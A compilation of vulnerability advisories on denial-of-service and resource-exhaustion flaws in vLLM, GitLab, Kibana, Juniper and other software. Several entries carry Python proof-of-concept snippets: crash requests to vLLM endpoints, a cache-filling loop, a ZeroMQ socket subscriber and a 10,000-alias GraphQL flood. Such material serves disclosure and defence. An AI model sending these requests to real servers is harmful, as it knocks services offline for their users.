vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0.
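As a rough sketch of the request shape described above, the snippet below sends a plain 1x1 image (a stand-in for the crafted input) to an OpenAI-compatible chat completions endpoint; the server URL and model name are assumptions for illustration, not values from the advisory.

```python
# Illustrative sketch only: shows the shape of a chat-completions request carrying a 1x1 image.
import base64
import io

import requests
from PIL import Image

# Build a 1x1 pixel PNG in memory and base64-encode it as a data URI.
buf = io.BytesIO()
Image.new("RGB", (1, 1)).save(buf, format="PNG")
data_uri = "data:image/png;base64," + base64.b64encode(buf.getvalue()).decode()

payload = {
    "model": "HuggingFaceM4/Idefics3-8B-Llama3",  # assumed Idefics3-based model name
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "Describe this image."},
            {"type": "image_url", "image_url": {"url": data_uri}},
        ],
    }],
}
# Assumed local OpenAI-compatible vLLM server; the advisory does not specify a URL.
resp = requests.post("http://localhost:8000/v1/chat/completions", json=payload, timeout=60)
print(resp.status_code, resp.text[:200])
```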
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
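A minimal sketch of the request pattern described above: many short decoding requests, each with a unique schema, with the outlines backend selected per request via `extra_body`. The base URL, model name, and the `guided_json` parameter name are assumptions for illustration; only the `guided_decoding_backend` key is named by the advisory.

```python
# Illustrative sketch: each request carries a slightly different JSON schema, so the
# outlines grammar cache gains a new on-disk entry per request.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")  # assumed server

for i in range(1000):
    schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},  # unique per request
        "required": [f"field_{i}"],
    }
    client.completions.create(
        model="my-model",        # assumed model name
        prompt="{",
        max_tokens=1,            # very short decode, as described in the advisory
        extra_body={
            "guided_json": schema,                   # assumed parameter name
            "guided_decoding_backend": "outlines",   # named by the advisory
        },
    )
```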
vLLM is an inference and serving engine for large language models (LLMs). Versions 0.8.0 up to but excluding 0.9.0 have a Denial of Service (ReDoS) vulnerability that causes the vLLM server to crash if an invalid regex is provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg/CVE-2025-48942, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, users can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with the correct number of dimensions (ndim) but an incorrect shape (e.g., a wrong hidden dimension), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page). This issue has been patched in version 0.11.1.
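A minimal sketch of the shape mismatch described above, assuming vLLM's offline `LLM` API accepts precomputed image embeddings through `multi_modal_data` for the chosen model; the model name, prompt placeholder, and expected embedding shape are illustrative assumptions.

```python
# Sketch only: constructs an embedding tensor with the right number of dimensions
# but a deliberately wrong hidden size.
import torch
from vllm import LLM

# Assumed multimodal model for illustration; prompt placeholder is model-specific.
llm = LLM(model="llava-hf/llava-1.5-7b-hf")

# Suppose the model expects image embeddings shaped (num_images, num_patches, hidden_size),
# e.g. (1, 576, 4096). This tensor has the correct ndim (3) but a wrong hidden dimension.
bad_embeds = torch.randn(1, 576, 1234)

outputs = llm.generate({
    "prompt": "USER: <image>\nWhat is shown in the image? ASSISTANT:",
    "multi_modal_data": {"image": bad_embeds},  # assumed embedding-input path
})
print(outputs)
```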
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAI-compatible endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
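A hedged sketch of a single tools request carrying malformed "pattern" and "type" values in the tool's parameter schema; the server URL and model name are assumptions for illustration.

```python
# Sketch only: one chat-completions request invoking the tools functionality with
# malformed "pattern" and "type" values in the tool's JSON-schema parameters.
import requests

payload = {
    "model": "my-model",  # assumed model name
    "messages": [{"role": "user", "content": "Look up the weather in Paris."}],
    "tools": [{
        "type": "function",
        "function": {
            "name": "get_weather",
            "parameters": {
                "type": "object",
                "properties": {
                    "city": {
                        "type": "unknown-type",   # malformed "type" value
                        "pattern": "([a-z]+(",    # malformed, unterminated regex
                    },
                },
            },
        },
    }],
    "tool_choice": "auto",
}
resp = requests.post("http://localhost:8000/v1/chat/completions", json=payload, timeout=60)
print(resp.status_code)
```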
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a Guided Param kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for a JSON schema instead of a regex. Version 0.9.0 fixes the issue.
vLLM, an inference and serving engine for large language models (LLMs), has a Regular Expression Denial of Service (ReDoS) vulnerability in the file `vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py` of versions 0.6.4 up to but excluding 0.9.0. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable. The pattern contains multiple nested quantifiers, optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking. Version 0.9.0 contains a patch for the issue.
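For illustration of catastrophic backtracking in general (this is not the actual pattern from `pythonic_tool_parser.py`), a classic nested-quantifier regex shows how matching time explodes on an almost-matching input:

```python
import re
import time

# Classic nested-quantifier pattern; NOT the pattern from pythonic_tool_parser.py.
pattern = re.compile(r"^(a+)+$")
subject = "a" * 24 + "!"  # almost matches, forcing exponential backtracking

start = time.perf_counter()
pattern.match(subject)
print(f"match attempt took {time.perf_counter() - start:.2f}s")
# Each additional 'a' roughly doubles the time taken.
```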
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.8.0 and prior to 0.8.5 are affected by a critical performance vulnerability in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs. This issue has been patched in version 0.8.5.
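A toy comparison, not vLLM's actual preprocessing code, showing why rebuilding a token list with repeated concatenation is quadratic while extending in place is roughly linear:

```python
import time

def expand_quadratic(num_placeholders: int, repeat: int) -> list[int]:
    tokens: list[int] = []
    for _ in range(num_placeholders):
        tokens = tokens + [0] * repeat      # copies the whole list every iteration
    return tokens

def expand_linear(num_placeholders: int, repeat: int) -> list[int]:
    tokens: list[int] = []
    for _ in range(num_placeholders):
        tokens.extend([0] * repeat)         # amortized O(1) per appended token
    return tokens

for fn in (expand_quadratic, expand_linear):
    start = time.perf_counter()
    fn(5000, 50)
    print(fn.__name__, f"{time.perf_counter() - start:.2f}s")
```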
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.5.2 and prior to 0.8.5 are vulnerable to denial of service and data exposure via ZeroMQ on multi-node vLLM deployment. In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts. Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker. By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher. This issue has been patched in version 0.8.5.
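A minimal sketch of the exposure described above: any client that can reach the port can subscribe to the XPUB socket and receive the broadcast data (and, per the advisory, a subscriber that never reads can slow or block the publisher). The host name and port below are assumptions; the advisory does not specify them.

```python
# Sketch only: connects a plain SUB socket to the XPUB endpoint and prints whatever
# is broadcast to the secondary vLLM hosts.
import zmq

ctx = zmq.Context()
sub = ctx.socket(zmq.SUB)
sub.setsockopt(zmq.SUBSCRIBE, b"")        # subscribe to all topics
sub.connect("tcp://vllm-head-node:5557")  # assumed host and port of the XPUB socket

while True:
    frames = sub.recv_multipart()
    print(f"received {len(frames)} frames, {sum(len(f) for f in frames)} bytes total")
```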
A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.
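A generic sketch of the alias abuse described above: one request whose single query contains thousands of aliased fields. The endpoint URL and the aliased field are placeholders, not details from the advisory.

```python
# Sketch only: builds a single GraphQL request containing thousands of aliased
# copies of one field, illustrating the batching/alias pattern described above.
import requests

aliases = "\n".join(f"q{i}: __typename" for i in range(10_000))
query = "query {\n" + aliases + "\n}"

resp = requests.post(
    "https://openshift.example.com/graphql",   # assumed endpoint for illustration
    json={"query": query},
    timeout=120,
)
print(resp.status_code, len(resp.content))
```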
A denial-of-service vulnerability in the Mattermost Playbooks plugin allows an authenticated user to crash the server via multiple large requests to one of the Playbooks API endpoints.
An Allocation of Resources Without Limits or Throttling vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an authenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS). When specific SNMP GET operations or specific low-privileged CLI commands are executed, a GUID resource leak will occur, eventually leading to exhaustion and causing FPCs to hang. Affected FPCs need to be manually restarted to recover. GUID exhaustion will trigger a syslog message like one of the following: evo-pfemand[<pid>]: get_next_guid: Ran out of Guid Space ... evo-aftmand-zx[<pid>]: get_next_guid: Ran out of Guid Space ... The leak can be monitored by running the following command and taking note of the values in the rightmost column labeled Guids: user@host> show platform application-info allocations app evo-pfemand/evo-pfemand If one or more of these values is constantly increasing, the leak is occurring. This issue affects Junos OS Evolved: * All versions before 21.4R2-EVO, * 22.1 versions before 22.1R2-EVO. Please note that this issue is similar to, but different from CVE-2024-47505 and CVE-2024-47508.
Foundry Artifacts was found to be vulnerable to a Denial of Service attack because the disk could potentially be filled up based on a user-supplied argument (size).
An Allocation of Resources Without Limits or Throttling vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an authenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS). When specific SNMP GET operations or specific low-privileged CLI commands are executed, a GUID resource leak will occur, eventually leading to exhaustion and causing FPCs to hang. Affected FPCs need to be manually restarted to recover. GUID exhaustion will trigger a syslog message like one of the following: evo-pfemand[<pid>]: get_next_guid: Ran out of Guid Space ... evo-aftmand-zx[<pid>]: get_next_guid: Ran out of Guid Space ... The leak can be monitored by running the following command and taking note of the values in the rightmost column labeled Guids: user@host> show platform application-info allocations app evo-pfemand/evo-pfemand If one or more of these values is constantly increasing, the leak is occurring. This issue affects Junos OS Evolved: * All versions before 21.4R3-S7-EVO, * 22.1 versions before 22.1R3-S6-EVO, * 22.2 versions before 22.2R3-EVO, * 22.3 versions before 22.3R3-EVO, * 22.4 versions before 22.4R2-EVO. Please note that this issue is similar to, but different from CVE-2024-47508 and CVE-2024-47509.
Mattermost versions 8.1.x before 8.1.12, 9.6.x before 9.6.1, 9.5.x before 9.5.3, 9.4.x before 9.4.5 fail to limit the number of active sessions, which allows an authenticated attacker to crash the server via repeated requests to the getSessions API after flooding the sessions table.
Teamplus Pro community discussion function has an ‘allocation of resources without limits or throttling’ vulnerability. A remote attacker with general user privileges who posts a thread with large content can cause the receiving client device to allocate too much memory, leading to abnormal termination of that client’s Teamplus Pro application.
Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. Fuzz testing, provided by the CNCF, identified input to functions in the _strvals_ package that can cause an out-of-memory panic. The _strvals_ package contains a parser that turns strings into structures Go can work with. Some string inputs can cause array data structures to be created, causing an out-of-memory panic. Applications that use the _strvals_ package in the Helm SDK to parse user-supplied input can suffer a Denial of Service when that input causes a panic that cannot be recovered from. The Helm Client will panic with input to `--set`, `--set-string`, and other value-setting flags that causes an out-of-memory panic. Helm is not a long-running service, so the panic will not affect future uses of the Helm client. This issue has been resolved in 3.9.4. SDK users can validate that strings supplied by users won't create large arrays causing significant memory usage before passing them to the _strvals_ functions.
An Allocation of Resources Without Limits or Throttling vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved allows an authenticated, network-based attacker to cause an FPC crash leading to a Denial of Service (DoS). When specific SNMP GET operations or specific low-privileged CLI commands are executed, a GUID resource leak will occur, eventually leading to exhaustion and causing FPCs to hang. Affected FPCs need to be manually restarted to recover. GUID exhaustion will trigger a syslog message like one of the following: evo-pfemand[<pid>]: get_next_guid: Ran out of Guid Space ... evo-aftmand-zx[<pid>]: get_next_guid: Ran out of Guid Space ... The leak can be monitored by running the following command and taking note of the values in the rightmost column labeled Guids: user@host> show platform application-info allocations app evo-pfemand/evo-pfemand If one or more of these values is constantly increasing, the leak is occurring. This issue affects Junos OS Evolved: * All versions before 21.2R3-S8-EVO, * 21.3 versions before 21.3R3-EVO, * 21.4 versions before 22.1R2-EVO, * 22.1 versions before 22.1R1-S1-EVO, 22.1R2-EVO. Please note that this issue is similar to, but different from CVE-2024-47505 and CVE-2024-47509.
Allocation of Resources Without Limits or Throttling in GitHub repository nocodb/nocodb prior to 0.92.0.
IBM Security Verify Information Queue 10.0.5, 10.0.6, 10.0.7, and 10.0.8 could allow a remote user to cause a denial of service due to improper handling of special characters that could lead to uncontrolled resource consumption.
A remote attacker with general user privileges can send a message to Teamplus Pro’s chat group that exceeds the message size limit, terminating other recipients’ Teamplus Pro chat processes.
An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2 where abusing the API to filter branches and tags could lead to Denial of Service.
An allocation of resources without limits or throttling in Kibana can lead to a crash caused by a specially crafted payload to a number of inputs in Kibana UI. This can be carried out by users with read access to any feature in Kibana.
GitLab has remediated an issue in GitLab EE affecting all versions from 15.6 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an authenticated user to cause Denial of Service by uploading a malicious file and repeatedly querying it through GraphQL.
GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an unauthenticated user to cause denial of service through CPU exhaustion by submitting specially crafted markdown files that trigger exponential processing in markdown preview.
Inserting certain large documents into a replica set could lead to replica set secondaries not being able to fetch the oplog from the primary. This could stall replication inside the replica set, leading to a server crash.
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user.
Mealie is a self-hosted recipe manager and meal planner. Prior to 1.4.0, the safe_scrape_html function uses a user-controlled URL to issue a request to a remote server; however, these requests are not rate-limited. While there are efforts to prevent DDoS by implementing a timeout on requests, it is possible for an attacker to issue a large number of requests to the server, which will be handled in batches based on the configuration of the Mealie server. The chunking of responses helps mitigate memory exhaustion on the Mealie server; however, a single request to an arbitrarily large external file (e.g., a Debian ISO) is often sufficient to completely saturate a CPU core assigned to the Mealie container. Without rate limiting in place, it is possible not only to sustain traffic against an external target indefinitely, but also to exhaust the CPU resources assigned to the Mealie container. This vulnerability is fixed in 1.4.0.
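For context on the missing control, the sketch below shows a generic per-client token-bucket limiter of the kind the advisory says was absent; it is not Mealie's actual fix, and the rate values are arbitrary.

```python
# Generic token-bucket rate limiter sketch; not Mealie's implementation.
import time
from collections import defaultdict

class TokenBucket:
    def __init__(self, rate_per_minute: int = 5, capacity: int = 5) -> None:
        self.rate = rate_per_minute / 60.0                     # tokens refilled per second
        self.capacity = capacity
        self.tokens = defaultdict(lambda: float(capacity))     # per-client token counts
        self.updated = defaultdict(time.monotonic)             # per-client last refill time

    def allow(self, client_id: str) -> bool:
        now = time.monotonic()
        elapsed = now - self.updated[client_id]
        self.updated[client_id] = now
        self.tokens[client_id] = min(self.capacity, self.tokens[client_id] + elapsed * self.rate)
        if self.tokens[client_id] >= 1.0:
            self.tokens[client_id] -= 1.0
            return True
        return False

bucket = TokenBucket(rate_per_minute=5)
for i in range(8):
    print(i, bucket.allow("user-123"))   # first 5 calls allowed, the rest denied until refill
```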
Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users.
Improper Input Validation (CWE-20) in Kibana's Email Connector can allow an attacker to cause an Excessive Allocation (CAPEC-130) through a specially crafted email address parameter. This requires an attacker to have authenticated access with view-level privileges sufficient to execute connector actions. The application attempts to process the specially crafted email format, resulting in complete service unavailability for all users until a manual restart is performed.
An allocation of resources without limits or throttling in Elasticsearch can lead to an OutOfMemoryError exception resulting in a crash via a specially crafted query using an SQL function.
Mattermost Server versions 8.1.x before 8.1.10 fail to limit the size of the payload that can be read and parsed, allowing an attacker to send a very large email payload and crash the server via resource exhaustion.
An issue has been discovered in GitLab CE/EE affecting all versions before 16.10.6, version 16.11 before 16.11.3, and 17.0 before 17.0.1. A runner registered with a crafted description has the potential to disrupt the loading of targeted GitLab web resources.
The Document and Media widget in Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.
OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can encounter an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue.
Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, authenticated users can submit crafted payloads to /drafts.json that cause O(n^2) processing in Base62.decode, tying up workers for 35-60 seconds per request. This affects all users as the shared worker pool becomes exhausted. This issue is patched in versions 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0. Lowering the max_draft_length site setting reduces attack surface but does not fully mitigate the issue, as payloads under the limit can still trigger the slow code path.
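The advisory does not spell out why the decode is quadratic; one common way a digit-by-digit base62 decode becomes O(n^2) is big-integer arithmetic on a growing accumulator, sketched below in Python (Discourse's implementation is Ruby and may differ).

```python
# Sketch of how a digit-by-digit base62 decode goes quadratic: each step multiplies
# an accumulator whose size grows with the input, so total work is O(n^2) in the
# input length. A generic illustration, not Discourse's code.
import string
import time

ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase  # 62 symbols

def base62_decode(s: str) -> int:
    value = 0
    for ch in s:
        value = value * 62 + ALPHABET.index(ch)   # bignum multiply grows with len(s)
    return value

for n in (20_000, 40_000, 80_000):
    start = time.perf_counter()
    base62_decode("z" * n)
    print(f"n={n}: {time.perf_counter() - start:.2f}s")   # roughly 4x per doubling
```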
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query.
In Aris v10.0.23.0.3587512 and before, the file upload functionality does not enforce any rate limiting or throttling, allowing users to upload files at an unrestricted rate. An attacker can exploit this behavior to rapidly upload a large volume of files, potentially leading to resource exhaustion such as disk space depletion, increased server load, or degraded performance.
An issue was discovered in GitLab CE/EE affecting all versions before 17.7.7, 17.8 prior to 17.8.5, and 17.9 prior to 17.9.2, where a denial of service vulnerability could allow an attacker to cause a system reboot under certain conditions.
A denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows an anonymous user to cause a denial of service against other anonymous users.
IBM Aspera Shares 1.9.0 through 1.10.0 PL6 does not properly rate limit the frequency that an authenticated user can send emails, which could result in email flooding or a denial of service.
An issue in the background management system of Shanxi Internet Chuangxiang Technology Co., Ltd v1.0.1 allows a remote attacker to cause a denial of service via the index.html component.
A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. An authenticated attacker can exhaust server storage space to the point where the server can no longer serve requests.
Allocation of Resources Without Limits or Throttling in GitHub repository vriteio/vrite prior to 0.3.0.
A denial of service vulnerability was identified in GitLab CE/EE, affecting all versions from 15.11 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2, which allows an attacker to spike the GitLab instance's resource usage, resulting in service degradation.
CODESYS Control V3, Gateway V3, and HMI V3 before 3.5.15.30 allow uncontrolled memory allocation which can result in a remote denial of service condition.
A flaw was found in CRI-O that involves an experimental annotation leading to a container being unconfined. This may allow a pod to specify and get any amount of memory/CPU, circumventing the Kubernetes scheduler and potentially resulting in a denial of service on the node.
In Spring Framework versions prior to 5.3.20 and 5.2.22, and in older unsupported versions, an application with a STOMP over WebSocket endpoint is vulnerable to a denial of service attack by an authenticated user.
In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.
A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The affected application does not properly limit the size of specific logs. This could allow an unauthenticated remote attacker to exhaust system resources by creating a large number of log entries, which could potentially lead to a denial of service condition. Successful exploitation requires the attacker to have access to specific SIMATIC RTLS Locating Manager Clients in the deployment.